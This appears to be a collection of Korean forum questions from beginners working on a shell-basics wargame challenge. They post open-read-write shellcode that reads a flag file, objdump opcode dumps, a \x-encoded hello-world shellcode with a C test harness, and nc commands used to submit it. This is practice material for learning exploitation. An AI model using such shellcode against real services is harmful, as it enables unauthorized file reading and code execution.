셸코드를 강의에서 나온 것처럼 orw.c 파일에 작성했습니다. 하지만 nc로 접속할 때 셸코드를 보낼 때 어떤 형태로 보내야 하나요?

pwntool의 기능이 아닌 직접 코드를 짜서 할려고 하는데 안되네요 asm( ".global run_sh\n" "run_sh:\n" "mov rax, 0x676E6F6F6F6F6F6F\n" "push rax \n" "mov rax, 0x6C5F73695F656D61\n" "push rax \n" "mov rax, 0x6E5F67616C662F63\n" "push rax \n" "mov rax, 0x697361625F6C6C65\n" "push rax \n" "mov rax, 0x68732F656D6F682F \n" "push rax \n" "mov rdi, rsp\n" "xor rsi, rsi\n" "xor rdx, rdx\n" "mov rax, 2\n" "syscall\n" "mov rdi, rax\n" "mov rsi, rsp\n" "sub rsi, 0x30\n" "mov rdx, 0x30\n" "mov rax, 0x0\n" "syscall\n" "mov rdi, 1\n" "mov rax, 0x1\n" "syscall\n" ); void run_sh(); int main() { run_sh(); } 어셈블리 코드는 다음과 같습니다. 쉘코드는 objdump로 구해서 이렇게 나왔고요

처음으로 wargame 접하다보니 길을 좀 잃었습니다. obj.c파일에서 주소를 /home/shell_basic/flag_name_is_loooooong바꾸고 objdump -d사용해서 opcode까지 뽑아냈습니다. 그렇게 뽑은 opcode를 nc host1.dreamhack.games 9349들어가서 shellcode: 에 냅다 붙여넣더니 아무 반응이 없다군요... 어떻게 opcode를 전달해야 하나요? 그리고 shell_basic.c은 어떻게 이용해야 하나요? 작성한 orw.c코드이고 밑에는 objdump -q ./orw 실행후 run_sh함수의 결과입니다... 캡처1.PNG 캡처2.PNG <run_sh>에 있는 기계어만 \x형태로 shellcode:에 전달하면 되는거 아닌가요?

orw 강의를 참고하여 쉘코드를 작성 하였는데요. 공격 서버에서 실행해도 답이 나오지 않고 이상한 값들만 출력이 되어서 디버깅을 통해 확인 해본 결과, image.png 파일을 열 때, push된 마지막의 경로만 open의 인자값으로 가져와 엉뚱한 경로에 있는 파일을 읽어 오는 것 같았습니다. 아래는 제 쉘코드 이고, image.png 이것은 인터넷에서 찾아본 쉘코드와 디버깅을 했을 때 입니다. image.png image.png 저 둘의 차이점을 확인해보니, 맨 처음에 push 0x0을 한다는 것입니다. 맨처음 push 0x0의 역할이 뭐길래 제 쉘코드는 스택의 마지막만 가져오고 인터넷의 쉘코드는 스택 전체를 다 가져오는 것인가요?

코드를 강의를 참고하여 캡처.PNG 다음과 같이 작성하였고 objdump를 한 뒤 orw에 해당하는 기계어만 가져와서 \x형태로 만들고 전송하려고 하는데 그냥 전송하면 안된다 해서 (python -c 'print("\x31\xc0...")';cat) | nc host1.dreamhack.games <port> 이런형식으로 터미널에 입력하고 엔터를 눌렀는데 shellcode: 문구만 뜨고 아무런 반응이 없습니다....혹시 어떻게 해야 하나요 처음이라 너무 어렵네요 ㅠㅠ

밑에 다른 게시글도 보고 어셈에서 OpCode로 변환하는 방법 찾아서 테스트 삼아 Hello world!!!\n를 출력하는 셀코드를 전송하였는데 아무 반응이 없습니다. 아래는 쉘 코드에 적용된 어셈블리로 작성된 코드 입니다. 주석은 이해를 돕기 위해 md 파일에만 작성되어 있으며 실제 코드에서는 주석이 없습니다. .globl main .type main, @function .intel_syntax noprefix main: push rbp mov rbp, rsp mov rax, 0xa212121646c726f ; 스택에 hello world!!!\n 저장중 push rax ; 스택에 hello world!!!\n 저장중 mov rax, 0x77202c6f6c6c6548 ; 스택에 hello world!!!\n 저장중 push rax ; 스택에 hello world!!!\n 저장중 xor rax, rax ; rax = 0 xor rdx, rdx ; rdx = 0 mov al, 0x1 ; al(rax) = 1 ; write mov rdi, rax ; rdi = rax(1) ; stdout lea rsi, [rsp] ; rsi = 스택에 저장된 hello world!!!\n 주소 mov dl, 0x10 ; rsi = 16 ; 출력할 글자 수 syscall ; write(stdout, 스택에 저장된 hello world!!!\n 주소, 16) xor rax, rax ; rax = 0 ; return 0 leave ret 해당 코드 작성 이후 gcc a.s -o a.out 커맨드를 통하여 어셈블리어를 컴파일하였고 ./a.out 커맨드 실행 결과로 Hello, world!!!\n이 나왔습니다. 이후 objdump -d a.out 커맨드로 OpCode를 확인하였고 이를 쉘 코드로 변경하였습니다. 아래는 objdump -d a.out 커맨드 출력 결과입니다. ...다른 코드들 00000000000005fa <main>: 5fa: 55 push %rbp 5fb: 48 89 e5 mov %rsp,%rbp 5fe: 48 b8 6f 72 6c 64 21 movabs $0xa212121646c726f,%rax 605: 21 21 0a 608: 50 push %rax 609: 48 b8 48 65 6c 6c 6f movabs $0x77202c6f6c6c6548,%rax 610: 2c 20 77 613: 50 push %rax 614: 48 31 c0 xor %rax,%rax 617: 48 31 d2 xor %rdx,%rdx 61a: b0 01 mov $0x1,%al 61c: 48 89 c7 mov %rax,%rdi 61f: 48 8d 34 24 lea (%rsp),%rsi 623: b2 10 mov $0x10,%dl 625: 0f 05 syscall 627: 48 31 c0 xor %rax,%rax 62a: c9 leaveq 62b: c3 retq 62c: 0f 1f 40 00 nopl 0x0(%rax) ...다른 코드들 아래는 위 결과를 셀 코드(OpCode)로 변환한 결과입니다. \x55\x48\x89\xe5\x48\xb8\x6f\x72\x6c\x64\x21\x21\x21\x0a\x50\x48\xb8\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x50\x48\x31\xc0\x48\x31\xd2\xb0\x01\x48\x89\xc7\x48\x8d\x34\x24\xb2\x10\x0f\x05\x48\x31\xc0\xc9\xc3\x0f\x1f\x40\x00 이후 해당 셀 코드가 정상 작동하는지 C 코드를 통해 확인 후 nc host1.dreamhack.games <custom port> 커맨드를 통해 제출하였는데 하다못해 에러 메세지조차도 없으며 아무런 반응이 없습니다. 아래는 C 코드를 통한 확인 및 제가 진행한 제출 과정입니다. 아래 코드에서는 shellcode: 이후 엔터가 들어간 것처럼 보이나 실제로는 한줄로 구성되어 있으며 길이가 길어 엔터가 들어간 것처럼 보이는 것입니다. root@dev:~/dh# cat a.c char s[] = "\x55\x48\x89\xe5\x48\xb8\x6f\x72\x6c\x64\x21\x21\x21\x0a\x50\x48\xb8\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x50\x48\x31\xc0\x48\x31\xd2\xb0\x01\x48\x89\xc7\x48\x8d\x34\x24\xb2\x10\x0f\x05\x48\x31\xc0\xc9\xc3\x0f\x1f\x40\x00"; int main(void) { ((void ()()) s)(); } root@dev:~/dh# gcc -fno-stack-protector -z execstack -o shell.out a.c root@dev:~/dh# ./shell.out Hello, world!!! root@dev:~/dh# nc host1.dreamhack.games <some port> shellcode: \x55\x48\x89\xe5\x48\xb8\x6f\x72\x6c\x64\x21\x21\x21\x0a\x50\x48\xb8\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x50\x48\x31\xc0\x48\x31\xd2\xb0\x01\x48\x89\xc7\x48\x8d\x34\x24\xb2\x10\x0f\x05\x48\x31\xc0\xc9\xc3\x0f\x1f\x40\x00 root@dev:~/dh# 어떻게 제출해야지 인식이 될까요...

orw를 통해 풀고나서 execve로 쉘을 따는 방식으로도 풀어보려고 했는데 안되네요. 안되는 이유로 /bin/sh 방식이 아니거나, execve syscall을 막아뒀다거나 등등을 생각해봤는데 왜 안되는지 명확한 이유가 있을까요?

rax에 넣는 값이 0x6e6f6f6f6f6f6f6c5f73695f656d616e5f67616c662f63697361625f6c6c6568732f656d6f682f라 너무 길어서 그런것같은데... flag가 /home/shell_basic/flag_name_is_loooooong에 있어서 길어질수밖에 없는데.. 어떻하나요?

objdump -d orw로 해서 기계어로 바꾸고 cat ./orw | nc {ip} {port} 실행했는데 shellcode: <- 이것만 뜨고 flag가 안 나오는데 서버로 부터 오는 정보를 받는 명령어가 따로 있나요?

mov rax, 0x676e6f6f6f6f6f6f push rax mov rax, 0x6c5f73695f656d61 push rax mov rax, 0x6e5f67616c662f63 push rax ... 이런식으로 파일 경로를 넣어주었는데 gdb로 나중에 열어보니 파일경로 끝에 \001이 붙어있었습니다... 처음 rsp값이 0x1이었는데 ni로 한줄한줄보니 oooooong\001 -> ame_is_loooooong\001 ->ell_basic/flag_name_is_loooooong\001 이렇게 저장이 되었습니다. 이게 문자열의 끝을 알려주지 않아 그런건가요??